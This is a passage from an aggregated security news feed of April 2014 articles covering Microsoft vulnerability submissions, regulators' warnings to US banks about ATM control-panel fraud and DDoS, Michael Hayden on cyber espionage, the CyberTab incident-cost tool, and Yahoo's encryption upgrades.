“That number is lower than where we’re at normally, and I don’t know why,” Kandek admitted. “I think people are submitting fewer vulnerabilities to Microsoft; that’s the only explanation I can come up with at the moment. There’s no reason we’re seeing fewer vulnerabilities and I don’t think there’s less research going on. There is no shortage of people who look for bugs, maybe there is a shortage of people who do it for free.”

Kandek’s observation regarding fewer bug submissions is simultaneously sensible and puzzling. On the one hand, Microsoft has been consistently sweetening the pot for the last year or so for security researchers who disclose bugs. On the other hand, exploit brokers like Vupen and other hacking teams are cashing in at hacking contests like Pwn2Own – where the payouts are bigger than ever – rather than submitting directly to Microsoft.

Regulators To US Banks: Be Vigilant of ATM Fraud, DDoS

Threatpost for B2B - Thu, 04/03/2014 - 14:46

U.S. regulators are warning banks this week about a recent rash of “large dollar value” ATM fraud and the ongoing risk posed by distributed denial of service (DDoS) attacks that target public bank websites.

Members of FFIEC, the Federal Financial Institutions Examination Council, an interagency body of the U.S. government responsible for preparing banking standards and principles, issued the warnings in a statement yesterday.

FFIEC claims attackers have been able to gain access to and alter the settings on web-based ATM control panels belonging to small- to medium-sized institutions. The campaign, nicknamed “Unlimited Operations” by the U.S. Secret Service, is allowing attackers to withdraw money beyond the controlled limits on ATMs, oftentimes more than the victim’s cash balance.

FFIEC’s warning describes how exactly the control panels figure into the ATMs:

“These control panels, often web-based, manage the amount of money customers may withdraw within a set time frame, the geographic limitations of withdrawals, the types and frequency of fraud reports that its service provider sends to the financial institutions, the designated employee that receives these reports, and other management functions related to card security and internal controls.”

Officials are claiming hackers used phishing attacks to obtain legitimate employee logins, then tweaked these settings to carry out their attacks, including one that netted them $40 million with 12 debit card accounts.

FFIEC also used the announcement as an opportunity to remind banks about the continued sophistication surrounding DDoS attacks – pointing out a string of attacks that affected institutions in 2012 and warning that they can be used as a “diversionary tactic,” granting hackers the time to root around systems.

Naturally, FFIEC is encouraging banks to mitigate further risk by following standards already in place, such as PCI DSS, and using hardware security modules (HSMs) when it comes to encrypting PINs.

The agency is also encouraging banks, if they haven’t already, to formulate some sort of DDoS readiness plan with a program that prioritizes and assesses risks in their critical systems.

“The members expect financial institutions to take steps to address this threat by reviewing the adequacy of their controls over their information technology networks,” the joint statement reads.

We first learned about “Unlimited Operations” last spring after eight members of the cybercrime ring were indicted in Brooklyn. Associates in at least 26 countries helped the crew cash out fake credit cards at 140 different ATMs to the tune of $45 million – $2.8 million in NYC – in just shy of 24 hours.

According to a federal indictment unsealed last year, the money was later spent on luxury items such as cars and Rolex watches.

Cyberespionage, Not Cyber Terror, is the Major Threat, Former NSA Director Says

Threatpost for B2B - Thu, 04/03/2014 - 10:40

CHANTILLY, VA–The list of threats on the Internet is long and getting longer each day. Cybercrime, nation-state attackers, cyber espionage and hacktivists all threaten the security and stability of the network and its users in one way or another. But the one threat that some experts have warned about for years, and that has never emerged, is cyber terrorism, a former top U.S. intelligence official said.

In the years after 9/11, as the Internet became an integral part of daily life in much of the world, some in the national security community warned that the network also would become a key conduit for terrorist attacks against a variety of targets. Utilities, critical infrastructure, banks and other vital pieces of the global economy would be choice targets for groups seeking to wreak havoc via electronic attacks. However, those attacks have not materialized.

“I don’t have a single example of cyber terrorism. Not one incident,” Michael Hayden, the former director of the CIA and NSA, said during a keynote speech at the Systems Engineering DC conference here Thursday.

“They use the Web to recruit and to proselytize, but they don’t use the Web to attack.”

Cyber terrorism, much like its close relation cyberwar, has become a loaded term in the security and intelligence communities. There are any number of definitions floating around for each of them, and none seems to have become authoritative. Attacks such as Stuxnet and Flame have been touted in some circles as examples of cyberwar, while others dispute this notion. And there’s often quite a bit of overlap between cyber terrorism, typical cybercrime and other attacks in discussions about the topic.

But the use of the Internet by traditional terrorist groups for attacks against physical assets–or to disrupt the Internet itself–is not something that’s going on right now, Hayden said.

“They’re into mass destruction and not mass disruption. Maybe they don’t want to disrupt the platform they’re using,” he said. “If they ever downshift to mass disruption, it could be very troubling.”

Hayden, who now works for the Chertoff Group, said that the threat landscape today is growing more complex every day, and that cybercrime, hacktivism, nation-state attackers and other elements all play a part in this. Of the malicious activities that pervade the Internet today, Hayden said that perhaps the largest threat is cyber espionage. Governments using electronic means to conduct corporate espionage or even traditional espionage remotely has become a sensitive topic in diplomatic circles, especially in light of the Snowden revelations about the NSA’s activities.

“The overwhelming majority is people going where they’re not invited and taking stuff they’re not entitled to,” Hayden said.

He emphasized that the U.S. intelligence community is very good at its job, which to a large degree involves taking other people’s stuff, but said the CIA and NSA don’t do so on behalf of American corporate interests. That, he said, is an important distinction.

“I know a fair bit about stealing stuff in the cyber domain. We’re really good at it, and we do it to keep you safe,” he said.

Tool Estimates Incident Response Cost for Businesses

Threatpost for B2B - Thu, 04/03/2014 - 10:31

A thorough and freely available tool aims to help security professionals and executives anonymously tabulate the costs incurred by enterprises following all manner of cyber-incidents.

Called CyberTab, the tool was created by The Economist Intelligence Unit and sponsored by the consulting firm Booz Allen Hamilton. While the tool is free, it gives users the choice of opting in to allowing their reports to be used as part of a study undertaken by The Economist.

Based on input estimates of incident response and business expenses, as well as those of lost sales and customers, CyberTab calculates the cost of a specific cyber attack and estimates the return on investment for preventative measures.

It has two modes, a planning mode, which estimates the cost of a potential attack to help organizations better understand the risks they face and their security investment choices, and a reporting mode, which examines and reports the cost of a specific attack that has already occurred based on a long list of factors.

Each mode asks users to identify the type of attack deployed against them. The options include denial of service attacks, malware infections, misuse of systems by employees or partners, intrusions with no data theft, intrusions with personal data theft, and intrusions with intellectual property data theft.

The tools also inquire – again anonymously – about the size of the affected enterprise, the industry and region in which it operates, the duration and time frame of a specific attack, when and by whom the attack was discovered, who carried out the attack, and what sorts of tactics and technologies were deployed by the attackers.

Beyond that, the tools take into account the types of systems and the number of servers and endpoints affected by the incident. In the case of DDoS attacks, the tools ask about the peak bandwidth in gigabits per second. The tool further takes into account the company data and types of accounts implicated in the attack, as well as the impact on intellectual property and the number of parties affected (employees, consumer and business customers, and partners).

Outside the details of the attack, the tools also seek out specific cost details. How many incident response workers does the company employ? Which and how many technology measures has the business invested in? Did the organization seek outside help following the incident? Were there legal or customer service and support costs incurred in the incident?

It offers a straightforward user interface and allows users to stop and save their progress at any time.

In the end, the CyberTab tool takes all these and more factors into account and estimates the total potential cost – in ranges – paid by an affected organization and the amount of money that they could save – for each dollar spent – by deploying preventative measures.


Yahoo Encrypts Data Center Links, Boosts Other Services

Threatpost for B2B - Thu, 04/03/2014 - 10:26

Yahoo certainly has taken its share of knocks during the past nine months of surveillance revelations and Snowden leaks for its encryption shortcomings. But the bruises are healing and the company is slowly working its way back into good graces.

After months of being an encryption laggard, Yahoo gained on the field with a number of enhancements announced last night by new chief information security officer Alex Stamos.

Chief among the improvements is that as of Monday, traffic moving between Yahoo data centers is encrypted. This, along with a lack of email encryption, was an area in which critics were especially harsh on Yahoo after top secret documents revealed the National Security Agency was able to sniff communications between Yahoo and Google data centers. The Washington Post reported at the time that a combined initiative between the NSA and Britain’s GCHQ called MUSCULAR allowed the intelligence agencies to copy data from the companies’ fiber-optic cables outside the U.S. Google, meanwhile, announced in November it had turned encryption on between its data centers.

“In light of reports that governments have directly tapped Internet backbones to obtain secret access to millions of people’s private communications, it’s become clear that routine use of encryption is an important basic measure for privacy and security online,” said Seth Schoen, senior staff technologist at the Electronic Frontier Foundation. “Without it, any network operator (from the smallest Wi-Fi node to the largest Internet backbone companies), or anyone who can coerce or infiltrate one, can easily see the intimate details of what people are saying online.”

As for email, Yahoo was one of the last major web-based email providers to turn on SSL by default, doing so in January after an initial foray in November when users were given the option to turn it on manually. Stamos said yesterday that in the last month, Yahoo turned on encryption of its email service between Yahoo’s servers and other email providers that support the SMTP TLS standard.

Yahoo has also turned on HTTPS encryption on its home page, on search queries that run from the home page and on most of its properties. Yahoo supports TLS 1.2, Perfect Forward Secrecy and 2048-bit RSA encryption for its home page, mail and digital magazines, Stamos said. He added that users can initiate encrypted sessions for Yahoo News, Sports, Finance and Good Morning America on Yahoo by entering an HTTPS URL. He also promised an encrypted version of Yahoo Messenger in the coming months.

“Our goal is to encrypt our entire platform for all users at all times, by default,” Stamos said.

Also on the road map, Stamos said, Yahoo plans to implement HSTS, Perfect Forward Secrecy and Certificate Transparency in the near future.

“One of our biggest areas of focus in the coming months is to work with and encourage thousands of our partners across all of Yahoo’s hundreds of global properties to make sure that any data that is running on our network is secure,” Stamos said. “Our broader mission is to not only make Yahoo secure, but improve the security of the overall web ecosystem.”

Forward secrecy has long been advocated by security and privacy experts as an important failsafe to secure data and communications. The technology keeps the content of old encrypted connections private even if the encryption key is lost or stolen in the future.

Yahoo was criticized heavily for its lack of encryption on its services, which experts said facilitated the NSA’s ability to snoop on traffic and harmed users’ ability to keep their identities and personal information secure from criminals operating on the web. While encryption doesn’t stop the government or law enforcement from obtaining user data via court orders or warrants, it does hamper their efforts to hack into servers and communication lines.

Meanwhile, the EFF’s Encrypt the Web report, which it continues to update, demonstrated Yahoo’s glaring encryption weaknesses in the wake of the initial Snowden leaks. Since then, most of the technology companies surveyed have tightened up their encryption practices, leaving only carriers such as Verizon, Comcast and AT&T in the rear.

“We commend Yahoo for taking these steps, and hope today’s announcements will continue to foster a recognition that encryption is an industry standard,” the EFF’s Schoen said.

Blog: Garfield Garfield True, or the story behind Syrian Malware, .NET Trojans and Social Engineering

Secure List feed for B2B - Thu, 04/03/2014 - 09:25
It's been a while since the last massive Internet outage took down Syria’s backbone network (AS29386).